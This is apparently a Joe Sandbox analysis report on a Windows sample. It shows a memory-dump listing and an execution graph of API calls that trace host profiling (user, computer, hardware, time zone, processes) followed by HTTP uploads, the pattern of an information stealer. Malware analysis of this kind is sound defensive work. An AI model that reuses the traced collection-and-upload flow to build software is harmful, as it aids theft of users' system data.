                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                            • String ID:
                                                                            • API String ID: 2744216297-0
                                                                            APIs
                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 001381E2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EncodePointer
                                                                            • String ID: MOC$RCC
                                                                            • API String ID: 2118026453-2084237596

                                                                            Execution Graph

                                                                            Execution Coverage:4.5%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:11.9%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:39
78495->78496 79605 40212d 78496->79605 78499 40f9e1 lstrcpy 78501 414381 78499->78501 78500 413d0a StrCmpCA 78502 414316 78500->78502 78500->78572 79608 402286 lstrcpy 78501->79608 78503 40f9e1 lstrcpy 78502->78503 78505 414325 78503->78505 78504 402147 lstrcpy 78504->78572 79603 40217b lstrcpy 78505->79603 78509 41432e 78511 40f9e1 lstrcpy 78509->78511 78510 414396 78512 40f9e1 lstrcpy 78510->78512 78514 41433c 78511->78514 78515 4143a4 78512->78515 78513 413eb7 StrCmpCA 78516 4142d1 78513->78516 78513->78572 79604 4022a0 lstrcpy 78514->79604 79609 4132d9 lstrcpy _EH_prolog 78515->79609 78517 40f9e1 lstrcpy 78516->78517 78518 4142e0 78517->78518 79601 4021c9 lstrcpy 78518->79601 78523 4142e9 78526 40f9e1 lstrcpy 78523->78526 78524 414261 78528 40f9e1 lstrcpy 78524->78528 78525 414064 StrCmpCA 78527 41428f 78525->78527 78525->78572 78529 4142f7 78526->78529 78532 40f9e1 lstrcpy 78527->78532 78531 41426f 78528->78531 79602 4022ba lstrcpy 78529->79602 78530 413118 33 API calls 78530->78572 79598 4132d9 lstrcpy _EH_prolog 78531->79598 78534 41429e 78532->78534 78533 413c89 StrCmpCA 78533->78572 79599 402217 lstrcpy 78534->79599 78535 402195 lstrcpy 78535->78572 78539 40217b lstrcpy 78539->78572 78541 4142a7 78543 40f9e1 lstrcpy 78541->78543 78542 41420b StrCmpCA 78545 414226 78542->78545 78546 414216 Sleep 78542->78546 78544 4142b5 78543->78544 79600 4022d4 lstrcpy 78544->79600 78549 40f9e1 lstrcpy 78545->78549 78546->78572 78547 41303a 28 API calls 78547->78572 78548 402231 lstrcpy 78548->78572 78550 414235 78549->78550 79596 402265 lstrcpy 78550->79596 78551 413e36 StrCmpCA 78551->78572 78553 4021e3 lstrcpy 78553->78572 78556 41428a 78559 413295 _EH_prolog 78556->78559 78557 41423e 78560 40f9e1 lstrcpy 78557->78560 78558 4021c9 lstrcpy 78558->78572 78561 41441b 78559->78561 78562 41424c 78560->78562 79590 401061 _EH_prolog 78561->79590 79597 4022ee lstrcpy 78562->79597 78564 413fe3 StrCmpCA 78564->78572 78565 414427 78573 4136b3 78565->78573 78567 402217 lstrcpy 
78567->78572 78568 414190 StrCmpCA 78568->78572 78569 402265 lstrcpy 78569->78572 78570 40f95a lstrcpy 78570->78572 78571 40f9e1 lstrcpy 78571->78572 78572->78488 78572->78490 78572->78491 78572->78492 78572->78493 78572->78500 78572->78504 78572->78513 78572->78525 78572->78530 78572->78533 78572->78535 78572->78539 78572->78542 78572->78547 78572->78548 78572->78551 78572->78553 78572->78558 78572->78564 78572->78567 78572->78568 78572->78569 78572->78570 78572->78571 79587 402113 78572->79587 79592 402161 lstrcpy 78572->79592 79593 4021af lstrcpy 78572->79593 79594 4021fd lstrcpy 78572->79594 79595 40224b lstrcpy 78572->79595 78574 40f9e1 lstrcpy 78573->78574 78575 4136c3 78574->78575 78576 40f9e1 lstrcpy 78575->78576 78577 4136cf 78576->78577 78578 40f9e1 lstrcpy 78577->78578 78579 4136db 78578->78579 78580 413295 _EH_prolog 78579->78580 78581 4132b5 78580->78581 78581->77681 78583 40f971 78582->78583 78584 40f986 78583->78584 78585 40f97e lstrcpy 78583->78585 78584->77688 78585->78584 78586->77698 78588 410516 GetVolumeInformationA 78587->78588 78589 41050f 78587->78589 78590 410546 78588->78590 78589->78588 78591 410578 GetProcessHeap HeapAlloc 78590->78591 78592 41059b wsprintfA lstrcat 78591->78592 78593 41058d 78591->78593 79610 4104a2 GetCurrentHwProfileA 78592->79610 78594 40f923 lstrcpy 78593->78594 78596 410596 78594->78596 78596->77705 78597 4105cb 78598 4105da lstrlenA 78597->78598 78599 4105ee 78598->78599 79614 411154 lstrcpy malloc strncpy 78599->79614 78601 4105f8 78602 410606 lstrcat 78601->78602 78603 410619 78602->78603 78604 40f923 lstrcpy 78603->78604 78605 41062a 78604->78605 78605->78596 78607 40f95a lstrcpy 78606->78607 78608 403b25 78607->78608 79615 403a54 _EH_prolog 78608->79615 78610 403b31 78611 40f923 lstrcpy 78610->78611 78612 403b4e 78611->78612 78613 40f923 lstrcpy 78612->78613 78614 403b61 78613->78614 78615 40f923 lstrcpy 78614->78615 78616 403b72 78615->78616 78617 40f923 lstrcpy 78616->78617 78618 403b83 78617->78618 78619 
40f923 lstrcpy 78618->78619 78620 403b94 78619->78620 78621 403ba4 InternetOpenA StrCmpCA 78620->78621 78622 403bc6 78621->78622 78623 404122 InternetCloseHandle 78622->78623 78624 410b5c 3 API calls 78622->78624 78637 404136 78623->78637 78625 403bdc 78624->78625 78626 40fa28 3 API calls 78625->78626 78627 403bef 78626->78627 78628 40f9e1 lstrcpy 78627->78628 78629 403bfc 78628->78629 78630 40fa9c 4 API calls 78629->78630 78631 403c25 78630->78631 78632 40f9e1 lstrcpy 78631->78632 78633 403c32 78632->78633 78634 40fa9c 4 API calls 78633->78634 78635 403c4f 78634->78635 78636 40f9e1 lstrcpy 78635->78636 78638 403c5c 78636->78638 78637->77708 78639 40fa28 3 API calls 78638->78639 78640 403c78 78639->78640 78641 40f9e1 lstrcpy 78640->78641 78642 403c85 78641->78642 78643 40fa9c 4 API calls 78642->78643 78644 403ca2 78643->78644 78645 40f9e1 lstrcpy 78644->78645 78646 403caf 78645->78646 78647 40fa9c 4 API calls 78646->78647 78648 403ccc 78647->78648 78649 40f9e1 lstrcpy 78648->78649 78650 403cd9 78649->78650 78651 40fa9c 4 API calls 78650->78651 78652 403cf7 78651->78652 78653 40fa28 3 API calls 78652->78653 78654 403d0a 78653->78654 78655 40f9e1 lstrcpy 78654->78655 78656 403d17 78655->78656 78657 403d2f InternetConnectA 78656->78657 78657->78623 78658 403d55 HttpOpenRequestA 78657->78658 78659 404119 InternetCloseHandle 78658->78659 78660 403d8e 78658->78660 78659->78623 78661 403d92 InternetSetOptionA 78660->78661 78662 403da8 78660->78662 78661->78662 78663 40fa9c 4 API calls 78662->78663 78664 403db9 78663->78664 78665 40f9e1 lstrcpy 78664->78665 78666 403dc6 78665->78666 78667 40fa28 3 API calls 78666->78667 78668 403de2 78667->78668 78669 40f9e1 lstrcpy 78668->78669 78670 403def 78669->78670 78671 40fa9c 4 API calls 78670->78671 78672 403e0c 78671->78672 78673 40f9e1 lstrcpy 78672->78673 78674 403e19 78673->78674 78675 40fa9c 4 API calls 78674->78675 78676 403e37 78675->78676 78677 40f9e1 lstrcpy 78676->78677 78678 403e44 78677->78678 78679 40fa9c 4 API calls 
78678->78679 78680 403e61 78679->78680 78681 40f9e1 lstrcpy 78680->78681 78682 403e6e 78681->78682 78683 40fa9c 4 API calls 78682->78683 78684 403e8b 78683->78684 78685 40f9e1 lstrcpy 78684->78685 78686 403e98 78685->78686 78687 40fa28 3 API calls 78686->78687 78688 403eb4 78687->78688 78689 40f9e1 lstrcpy 78688->78689 78690 403ec1 78689->78690 78691 40fa9c 4 API calls 78690->78691 78692 403ede 78691->78692 78693 40f9e1 lstrcpy 78692->78693 78694 403eeb 78693->78694 78695 40fa9c 4 API calls 78694->78695 78696 403f08 78695->78696 78697 40f9e1 lstrcpy 78696->78697 78698 403f15 78697->78698 78699 40fa28 3 API calls 78698->78699 78700 403f31 78699->78700 78701 40f9e1 lstrcpy 78700->78701 78702 403f3e 78701->78702 78703 40fa9c 4 API calls 78702->78703 78704 403f5b 78703->78704 78705 40f9e1 lstrcpy 78704->78705 78706 403f68 78705->78706 78707 40fa9c 4 API calls 78706->78707 78708 403f86 78707->78708 78709 40f9e1 lstrcpy 78708->78709 78710 403f93 78709->78710 78711 40fa9c 4 API calls 78710->78711 78712 403fb0 78711->78712 78713 40f9e1 lstrcpy 78712->78713 78714 403fbd 78713->78714 78715 40fa9c 4 API calls 78714->78715 78716 403fda 78715->78716 78717 40f9e1 lstrcpy 78716->78717 78718 403fe7 78717->78718 78719 40fa28 3 API calls 78718->78719 78720 404003 78719->78720 78721 40f9e1 lstrcpy 78720->78721 78722 404010 78721->78722 78723 40f923 lstrcpy 78722->78723 78724 404029 78723->78724 78725 40fa28 3 API calls 78724->78725 78726 40403d 78725->78726 78727 40fa28 3 API calls 78726->78727 78728 404050 78727->78728 78729 40f9e1 lstrcpy 78728->78729 78730 40405d 78729->78730 78731 40407d lstrlenA 78730->78731 78732 40408d 78731->78732 78733 404096 lstrlenA 78732->78733 79623 40fb4d 78733->79623 78735 4040a6 HttpSendRequestA 78736 4040ef InternetReadFile 78735->78736 78737 404106 InternetCloseHandle 78736->78737 78740 4040b5 78736->78740 79624 40f98e 78737->79624 78739 40fa9c 4 API calls 78739->78740 78740->78736 78740->78737 78740->78739 78741 40f9e1 lstrcpy 78740->78741 
78741->78740 79628 40fb4d 78742->79628 78744 411cfe StrCmpCA 78745 411d10 78744->78745 78746 411d09 ExitProcess 78744->78746 78747 411d20 strtok_s 78745->78747 78748 411e6d 78747->78748 78761 411d31 78747->78761 78748->77710 78749 411e52 strtok_s 78749->78748 78749->78761 78750 411d81 StrCmpCA 78750->78749 78750->78761 78751 411df1 StrCmpCA 78751->78749 78751->78761 78752 411d65 StrCmpCA 78752->78749 78752->78761 78753 411dc7 StrCmpCA 78753->78749 78753->78761 78754 411e06 StrCmpCA 78754->78749 78755 411d49 StrCmpCA 78755->78749 78755->78761 78756 411d9d StrCmpCA 78756->78749 78756->78761 78757 411ddc StrCmpCA 78757->78749 78757->78761 78758 411e1c StrCmpCA 78758->78749 78759 411e3e StrCmpCA 78759->78749 78760 40f997 2 API calls 78760->78761 78761->78749 78761->78750 78761->78751 78761->78752 78761->78753 78761->78754 78761->78755 78761->78756 78761->78757 78761->78758 78761->78759 78761->78760 78763 40f95a lstrcpy 78762->78763 78764 40517c 78763->78764 78765 403a54 6 API calls 78764->78765 78766 405188 78765->78766 78767 40f923 lstrcpy 78766->78767 78768 4051a5 78767->78768 78769 40f923 lstrcpy 78768->78769 78770 4051b8 78769->78770 78771 40f923 lstrcpy 78770->78771 78772 4051c9 78771->78772 78773 40f923 lstrcpy 78772->78773 78774 4051da 78773->78774 78775 40f923 lstrcpy 78774->78775 78776 4051eb 78775->78776 78777 4051fb InternetOpenA StrCmpCA 78776->78777 78778 40521d 78777->78778 78779 4058d8 InternetCloseHandle 78778->78779 78781 410b5c 3 API calls 78778->78781 78780 4058f3 78779->78780 79635 406242 CryptStringToBinaryA 78780->79635 78782 405233 78781->78782 78784 40fa28 3 API calls 78782->78784 78786 405246 78784->78786 78787 40f9e1 lstrcpy 78786->78787 78792 405253 78787->78792 78788 40f997 2 API calls 78789 40590c 78788->78789 78790 40fa9c 4 API calls 78789->78790 78791 40591a 78790->78791 78793 40f9e1 lstrcpy 78791->78793 78794 40fa9c 4 API calls 78792->78794 78798 405926 78793->78798 78795 40527c 78794->78795 78796 40f9e1 lstrcpy 78795->78796 78797 405289 
78796->78797 78799 40fa9c 4 API calls 78797->78799 78800 401061 _EH_prolog 78798->78800 78801 4052a6 78799->78801 78802 405984 78800->78802 78803 40f9e1 lstrcpy 78801->78803 78802->77716 78804 4052b3 78803->78804 78805 40fa28 3 API calls 78804->78805 78806 4052cf 78805->78806 78807 40f9e1 lstrcpy 78806->78807 78808 4052dc 78807->78808 78809 40fa9c 4 API calls 78808->78809 78810 4052f9 78809->78810 78811 40f9e1 lstrcpy 78810->78811 78812 405306 78811->78812 78813 40fa9c 4 API calls 78812->78813 78814 405323 78813->78814 78815 40f9e1 lstrcpy 78814->78815 78816 405330 78815->78816 78817 40fa9c 4 API calls 78816->78817 78818 40534e 78817->78818 78819 40fa28 3 API calls 78818->78819 78820 405361 78819->78820 78821 40f9e1 lstrcpy 78820->78821 78822 40536e 78821->78822 78823 405386 InternetConnectA 78822->78823 78823->78779 78824 4053ac HttpOpenRequestA 78823->78824 78825 4053e3 78824->78825 78826 4058cf InternetCloseHandle 78824->78826 78827 4053e7 InternetSetOptionA 78825->78827 78828 4053fd 78825->78828 78826->78779 78827->78828 78829 40fa9c 4 API calls 78828->78829 78830 40540e 78829->78830 78831 40f9e1 lstrcpy 78830->78831 78832 40541b 78831->78832 78833 40fa28 3 API calls 78832->78833 78834 405437 78833->78834 78835 40f9e1 lstrcpy 78834->78835 78836 405444 78835->78836 78837 40fa9c 4 API calls 78836->78837 78838 405461 78837->78838 78839 40f9e1 lstrcpy 78838->78839 78840 40546e 78839->78840 78841 40fa9c 4 API calls 78840->78841 78842 40548c 78841->78842 78843 40f9e1 lstrcpy 78842->78843 78844 405499 78843->78844 78845 40fa9c 4 API calls 78844->78845 78846 4054b7 78845->78846 78847 40f9e1 lstrcpy 78846->78847 78848 4054c4 78847->78848 78849 40fa9c 4 API calls 78848->78849 78850 4054e1 78849->78850 78851 40f9e1 lstrcpy 78850->78851 78852 4054ee 78851->78852 78853 40fa28 3 API calls 78852->78853 78854 40550a 78853->78854 78855 40f9e1 lstrcpy 78854->78855 78856 405517 78855->78856 78857 40fa9c 4 API calls 78856->78857 78858 405534 78857->78858 78859 40f9e1 lstrcpy 
78858->78859 78860 405541 78859->78860 78861 40fa9c 4 API calls 78860->78861 78862 40555e 78861->78862 78863 40f9e1 lstrcpy 78862->78863 78864 40556b 78863->78864 78865 40fa28 3 API calls 78864->78865 78866 405587 78865->78866 78867 40f9e1 lstrcpy 78866->78867 78868 405594 78867->78868 78869 40fa9c 4 API calls 78868->78869 78870 4055b1 78869->78870 78871 40f9e1 lstrcpy 78870->78871 78872 4055be 78871->78872 78873 40fa9c 4 API calls 78872->78873 78874 4055dc 78873->78874 78875 40f9e1 lstrcpy 78874->78875 78876 4055e9 78875->78876 78877 40fa9c 4 API calls 78876->78877 78878 405606 78877->78878 78879 40f9e1 lstrcpy 78878->78879 78880 405613 78879->78880 78881 40fa9c 4 API calls 78880->78881 78882 405630 78881->78882 78883 40f9e1 lstrcpy 78882->78883 78884 40563d 78883->78884 78885 40fa9c 4 API calls 78884->78885 78886 40565b 78885->78886 78887 40f9e1 lstrcpy 78886->78887 78888 405668 78887->78888 78889 40fa9c 4 API calls 78888->78889 78890 405685 78889->78890 78891 40f9e1 lstrcpy 78890->78891 78892 405692 78891->78892 78893 40fa9c 4 API calls 78892->78893 78894 4056af 78893->78894 78895 40f9e1 lstrcpy 78894->78895 78896 4056bc 78895->78896 78897 40fa28 3 API calls 78896->78897 78898 4056d8 78897->78898 78899 40f9e1 lstrcpy 78898->78899 78900 4056e5 78899->78900 78901 40fa9c 4 API calls 78900->78901 78902 405702 78901->78902 78903 40f9e1 lstrcpy 78902->78903 78904 40570f 78903->78904 78905 40fa9c 4 API calls 78904->78905 78906 40572d 78905->78906 78907 40f9e1 lstrcpy 78906->78907 78908 40573a 78907->78908 78909 40fa9c 4 API calls 78908->78909 78910 405757 78909->78910 78911 40f9e1 lstrcpy 78910->78911 78912 405764 78911->78912 78913 40fa9c 4 API calls 78912->78913 78914 405781 78913->78914 78915 40f9e1 lstrcpy 78914->78915 78916 40578e 78915->78916 78917 40fa28 3 API calls 78916->78917 78918 4057aa 78917->78918 78919 40f9e1 lstrcpy 78918->78919 78920 4057b7 78919->78920 78921 4057cb lstrlenA 78920->78921 79629 40fb4d 78921->79629 78923 4057dc lstrlenA GetProcessHeap 
HeapAlloc 79630 40fb4d 78923->79630 78925 4057fe lstrlenA 79631 40fb4d 78925->79631 78927 40580e memcpy 79632 40fb4d 78927->79632 78929 405820 lstrlenA 78930 405830 78929->78930 78931 405839 lstrlenA memcpy 78930->78931 79633 40fb4d 78931->79633 78933 405855 lstrlenA 79634 40fb4d 78933->79634 78935 405865 HttpSendRequestA 78936 4058b1 InternetReadFile 78935->78936 78937 4058c8 InternetCloseHandle 78936->78937 78939 405877 78936->78939 78937->78826 78938 40fa9c 4 API calls 78938->78939 78939->78936 78939->78937 78939->78938 78940 40f9e1 lstrcpy 78939->78940 78940->78939 79640 40fb4d 78941->79640 78943 411740 strtok_s 78944 4117a9 78943->78944 78945 41174d 78943->78945 78944->77718 78946 411792 strtok_s 78945->78946 78947 40f997 2 API calls 78945->78947 78948 40f997 2 API calls 78945->78948 78946->78944 78946->78945 78947->78946 78948->78945 79641 40fb4d 78949->79641 78951 41151d strtok_s 78956 41152e 78951->78956 78958 41162e 78951->78958 78952 4115df StrCmpCA 78952->78956 78953 40f997 2 API calls 78954 411611 strtok_s 78953->78954 78954->78956 78954->78958 78955 4115ae StrCmpCA 78955->78956 78956->78952 78956->78953 78956->78954 78956->78955 78957 411589 StrCmpCA 78956->78957 78959 41155b StrCmpCA 78956->78959 78957->78956 78958->77726 78959->78956 79642 40fb4d 78960->79642 78962 411674 strtok_s 78963 411681 78962->78963 78964 4116fa 78962->78964 78965 40f997 2 API calls 78963->78965 78966 4116ab StrCmpCA 78963->78966 78967 4116e3 strtok_s 78963->78967 78968 40f997 2 API calls 78963->78968 78964->77734 78965->78967 78966->78963 78967->78963 78967->78964 78968->78963 78970 40f923 lstrcpy 78969->78970 78971 414625 78970->78971 78972 40fa9c 4 API calls 78971->78972 78973 41463a 78972->78973 78974 40f9e1 lstrcpy 78973->78974 78975 414647 78974->78975 78976 40fa9c 4 API calls 78975->78976 78977 414665 78976->78977 78978 40f9e1 lstrcpy 78977->78978 78979 414672 78978->78979 78980 40fa9c 4 API calls 78979->78980 78981 41468f 78980->78981 78982 40f9e1 lstrcpy 78981->78982 
78983 41469c 78982->78983 78984 40fa9c 4 API calls 78983->78984 78985 4146b9 78984->78985 78986 40f9e1 lstrcpy 78985->78986 78987 4146c6 78986->78987 78988 40fa9c 4 API calls 78987->78988 78989 4146e3 78988->78989 78990 40f9e1 lstrcpy 78989->78990 78991 4146f0 78990->78991 79643 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 78991->79643 78993 414701 78994 40fa9c 4 API calls 78993->78994 78995 41470e 78994->78995 78996 40f9e1 lstrcpy 78995->78996 78997 41471b 78996->78997 78998 40fa9c 4 API calls 78997->78998 78999 414738 78998->78999 79000 40f9e1 lstrcpy 78999->79000 79001 414745 79000->79001 79002 40fa9c 4 API calls 79001->79002 79003 414762 79002->79003 79004 40f9e1 lstrcpy 79003->79004 79005 41476f 79004->79005 79644 410415 memset RegOpenKeyExA 79005->79644 79007 414780 79008 40fa9c 4 API calls 79007->79008 79009 41478d 79008->79009 79010 40f9e1 lstrcpy 79009->79010 79011 41479a 79010->79011 79012 40fa9c 4 API calls 79011->79012 79013 4147b7 79012->79013 79014 40f9e1 lstrcpy 79013->79014 79015 4147c4 79014->79015 79016 40fa9c 4 API calls 79015->79016 79017 4147e1 79016->79017 79018 40f9e1 lstrcpy 79017->79018 79019 4147ee 79018->79019 79020 4104a2 2 API calls 79019->79020 79021 414803 79020->79021 79022 40fa28 3 API calls 79021->79022 79023 414815 79022->79023 79024 40f9e1 lstrcpy 79023->79024 79025 414822 79024->79025 79026 40fa9c 4 API calls 79025->79026 79027 41484b 79026->79027 79028 40f9e1 lstrcpy 79027->79028 79029 414858 79028->79029 79030 40fa9c 4 API calls 79029->79030 79031 414875 79030->79031 79032 40f9e1 lstrcpy 79031->79032 79033 414882 79032->79033 79034 4104dd 13 API calls 79033->79034 79035 414897 79034->79035 79036 40fa28 3 API calls 79035->79036 79037 4148a9 79036->79037 79038 40f9e1 lstrcpy 79037->79038 79039 4148b6 79038->79039 79040 40fa9c 4 API calls 79039->79040 79041 4148df 79040->79041 79042 40f9e1 lstrcpy 79041->79042 79043 4148ec 79042->79043 79044 40fa9c 4 API calls 79043->79044 79045 414909 79044->79045 79046 40f9e1 lstrcpy 
79045->79046 79047 414916 79046->79047 79048 414922 GetCurrentProcessId 79047->79048 79648 411001 OpenProcess 79048->79648 79051 40fa28 3 API calls 79052 414945 79051->79052 79053 40f9e1 lstrcpy 79052->79053 79054 414952 79053->79054 79055 40fa9c 4 API calls 79054->79055 79056 41497b 79055->79056 79057 40f9e1 lstrcpy 79056->79057 79058 414988 79057->79058 79059 40fa9c 4 API calls 79058->79059 79060 4149a5 79059->79060 79061 40f9e1 lstrcpy 79060->79061 79062 4149b2 79061->79062 79063 40fa9c 4 API calls 79062->79063 79064 4149cf 79063->79064 79065 40f9e1 lstrcpy 79064->79065 79066 4149dc 79065->79066 79067 40fa9c 4 API calls 79066->79067 79068 4149f9 79067->79068 79069 40f9e1 lstrcpy 79068->79069 79070 414a06 79069->79070 79653 41064b GetProcessHeap HeapAlloc 79070->79653 79073 40fa9c 4 API calls 79074 414a24 79073->79074 79075 40f9e1 lstrcpy 79074->79075 79076 414a31 79075->79076 79077 40fa9c 4 API calls 79076->79077 79078 414a4e 79077->79078 79079 40f9e1 lstrcpy 79078->79079 79080 414a5b 79079->79080 79081 40fa9c 4 API calls 79080->79081 79082 414a78 79081->79082 79083 40f9e1 lstrcpy 79082->79083 79084 414a85 79083->79084 79659 41077c _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 79084->79659 79087 40fa28 3 API calls 79088 414aac 79087->79088 79089 40f9e1 lstrcpy 79088->79089 79090 414ab9 79089->79090 79091 40fa9c 4 API calls 79090->79091 79092 414ae2 79091->79092 79093 40f9e1 lstrcpy 79092->79093 79094 414aef 79093->79094 79095 40fa9c 4 API calls 79094->79095 79096 414b0c 79095->79096 79097 40f9e1 lstrcpy 79096->79097 79098 414b19 79097->79098 79672 410925 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 79098->79672 79101 40fa28 3 API calls 79102 414b40 79101->79102 79103 40f9e1 lstrcpy 79102->79103 79104 414b4d 79103->79104 79105 40fa9c 4 API calls 79104->79105 79106 414b76 79105->79106 79107 40f9e1 lstrcpy 79106->79107 79108 414b83 79107->79108 79109 40fa9c 4 API calls 79108->79109 79110 414ba0 79109->79110 79111 40f9e1 lstrcpy 
79110->79111 79112 414bad 79111->79112 79685 40fbfd GetProcessHeap HeapAlloc GetComputerNameA 79112->79685 79115 40fa9c 4 API calls 79116 414bcb 79115->79116 79117 40f9e1 lstrcpy 79116->79117 79118 414bd8 79117->79118 79119 40fa9c 4 API calls 79118->79119 79120 414bf5 79119->79120 79121 40f9e1 lstrcpy 79120->79121 79122 414c02 79121->79122 79123 40fa9c 4 API calls 79122->79123 79124 414c1f 79123->79124 79125 40f9e1 lstrcpy 79124->79125 79126 414c2c 79125->79126 79687 40fbcb GetProcessHeap HeapAlloc GetUserNameA 79126->79687 79128 414c3d 79129 40fa9c 4 API calls 79128->79129 79130 414c4a 79129->79130 79131 40f9e1 lstrcpy 79130->79131 79132 414c57 79131->79132 79133 40fa9c 4 API calls 79132->79133 79134 414c74 79133->79134 79135 40f9e1 lstrcpy 79134->79135 79136 414c81 79135->79136 79137 40fa9c 4 API calls 79136->79137 79138 414c9e 79137->79138 79139 40f9e1 lstrcpy 79138->79139 79140 414cab 79139->79140 79688 4103a0 7 API calls 79140->79688 79143 40fa28 3 API calls 79144 414cd2 79143->79144 79145 40f9e1 lstrcpy 79144->79145 79146 414cdf 79145->79146 79147 40fa9c 4 API calls 79146->79147 79148 414d08 79147->79148 79149 40f9e1 lstrcpy 79148->79149 79150 414d15 79149->79150 79151 40fa9c 4 API calls 79150->79151 79152 414d32 79151->79152 79153 40f9e1 lstrcpy 79152->79153 79154 414d3f 79153->79154 79691 40fce5 _EH_prolog 79154->79691 79157 40fa28 3 API calls 79158 414d69 79157->79158 79159 40f9e1 lstrcpy 79158->79159 79160 414d76 79159->79160 79161 40fa9c 4 API calls 79160->79161 79162 414da5 79161->79162 79163 40f9e1 lstrcpy 79162->79163 79164 414db2 79163->79164 79165 40fa9c 4 API calls 79164->79165 79166 414dd5 79165->79166 79167 40f9e1 lstrcpy 79166->79167 79168 414de2 79167->79168 79701 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 79168->79701 79170 414df6 79171 40fa9c 4 API calls 79170->79171 79172 414e06 79171->79172 79173 40f9e1 lstrcpy 79172->79173 79174 414e13 79173->79174 79175 40fa9c 4 API calls 79174->79175 79176 414e36 79175->79176 79177 40f9e1 
lstrcpy 79176->79177 79178 414e43 79177->79178 79179 40fa9c 4 API calls 79178->79179 79180 414e63 79179->79180 79181 40f9e1 lstrcpy 79180->79181 79182 414e70 79181->79182 79702 40fc92 GetProcessHeap HeapAlloc GetTimeZoneInformation 79182->79702 79185 40fa9c 4 API calls 79186 414e8e 79185->79186 79187 40f9e1 lstrcpy 79186->79187 79188 414e9b 79187->79188 79189 40fa9c 4 API calls 79188->79189 79190 414ebb 79189->79190 79191 40f9e1 lstrcpy 79190->79191 79192 414ec8 79191->79192 79193 40fa9c 4 API calls 79192->79193 79194 414eeb 79193->79194 79195 40f9e1 lstrcpy 79194->79195 79196 414ef8 79195->79196 79197 40fa9c 4 API calls 79196->79197 79198 414f1b 79197->79198 79199 40f9e1 lstrcpy 79198->79199 79200 414f28 79199->79200 79705 40fe18 GetProcessHeap HeapAlloc RegOpenKeyExA 79200->79705 79203 40fa9c 4 API calls 79204 414f4c 79203->79204 79205 40f9e1 lstrcpy 79204->79205 79206 414f59 79205->79206 79207 40fa9c 4 API calls 79206->79207 79208 414f7c 79207->79208 79209 40f9e1 lstrcpy 79208->79209 79210 414f89 79209->79210 79211 40fa9c 4 API calls 79210->79211 79212 414fa9 79211->79212 79213 40f9e1 lstrcpy 79212->79213 79214 414fb6 79213->79214 79708 40feb4 79214->79708 79217 40fa9c 4 API calls 79218 414fd4 79217->79218 79219 40f9e1 lstrcpy 79218->79219 79220 414fe1 79219->79220 79221 40fa9c 4 API calls 79220->79221 79222 415001 79221->79222 79223 40f9e1 lstrcpy 79222->79223 79224 41500e 79223->79224 79225 40fa9c 4 API calls 79224->79225 79226 41502e 79225->79226 79227 40f9e1 lstrcpy 79226->79227 79228 41503b 79227->79228 79723 40fe81 GetSystemInfo wsprintfA 79228->79723 79230 41504c 79231 40fa9c 4 API calls 79230->79231 79232 415059 79231->79232 79233 40f9e1 lstrcpy 79232->79233 79234 415066 79233->79234 79235 40fa9c 4 API calls 79234->79235 79236 415086 79235->79236 79237 40f9e1 lstrcpy 79236->79237 79238 415093 79237->79238 79239 40fa9c 4 API calls 79238->79239 79240 4150b3 79239->79240 79241 40f9e1 lstrcpy 79240->79241 79242 4150c0 79241->79242 79724 40ff81 GetProcessHeap 
HeapAlloc 79242->79724 79244 4150d1 79245 40fa9c 4 API calls 79244->79245 79246 4150de 79245->79246 79247 40f9e1 lstrcpy 79246->79247 79248 4150eb 79247->79248 79249 40fa9c 4 API calls 79248->79249 79250 41510b 79249->79250 79251 40f9e1 lstrcpy 79250->79251 79252 415118 79251->79252 79253 40fa9c 4 API calls 79252->79253 79254 41513b 79253->79254 79255 40f9e1 lstrcpy 79254->79255 79256 415148 79255->79256 79729 40ffea _EH_prolog 79256->79729 79259 40fa28 3 API calls 79260 415178 79259->79260 79261 40f9e1 lstrcpy 79260->79261 79262 415185 79261->79262 79263 40fa9c 4 API calls 79262->79263 79264 4151b7 79263->79264 79265 40f9e1 lstrcpy 79264->79265 79266 4151c4 79265->79266 79267 40fa9c 4 API calls 79266->79267 79268 4151e7 79267->79268 79269 40f9e1 lstrcpy 79268->79269 79270 4151f4 79269->79270 79735 4102c3 _EH_prolog 79270->79735 79272 41520f 79273 40fa28 3 API calls 79272->79273 79274 415224 79273->79274 79275 40f9e1 lstrcpy 79274->79275 79276 415231 79275->79276 79277 40fa9c 4 API calls 79276->79277 79278 415263 79277->79278 79279 40f9e1 lstrcpy 79278->79279 79280 415270 79279->79280 79281 40fa9c 4 API calls 79280->79281 79282 415293 79281->79282 79283 40f9e1 lstrcpy 79282->79283 79284 4152a0 79283->79284 79743 410071 _EH_prolog 79284->79743 79286 4152bd 79287 40fa28 3 API calls 79286->79287 79288 4152d3 79287->79288 79289 40f9e1 lstrcpy 79288->79289 79290 4152e0 79289->79290 79291 410071 15 API calls 79290->79291 79292 41530c 79291->79292 79293 40fa28 3 API calls 79292->79293 79294 41531f 79293->79294 79295 40f9e1 lstrcpy 79294->79295 79296 41532c 79295->79296 79297 40fa9c 4 API calls 79296->79297 79298 415358 79297->79298 79299 40f9e1 lstrcpy 79298->79299 79300 415365 79299->79300 79301 415379 